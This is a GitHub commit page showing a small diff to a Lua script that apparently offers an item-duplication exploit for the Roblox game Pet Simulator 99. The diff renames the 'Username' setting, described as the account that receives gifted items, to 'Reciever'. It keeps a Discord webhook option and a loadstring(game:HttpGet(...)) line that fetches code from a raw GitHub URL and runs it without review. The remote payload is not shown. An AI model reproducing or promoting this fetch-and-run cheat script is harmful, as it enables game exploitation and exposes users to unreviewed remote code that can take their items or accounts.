We read every piece of feedback, and take your input very seriously.
To see all available qualifiers, see our documentation.
1 parent 1c55a7b commit 3052f73Copy full SHA for 3052f73
release
@@ -1,4 +1,4 @@
1
-Username = "YourNameHere" -- the username of the account you want the items to be gifted to. (aka you)
+Reciever = "YourNameHere" -- the username of the account you want the items to be gifted to. (aka you)
2
Webhook = "nil" -- leave as nil if you dont want it to send through a discord webhook
3
4
loadstring(game:HttpGet("https://raw.githubusercontent.com/LyherScript/ps99-duplication/main/release", true))()
0 commit comments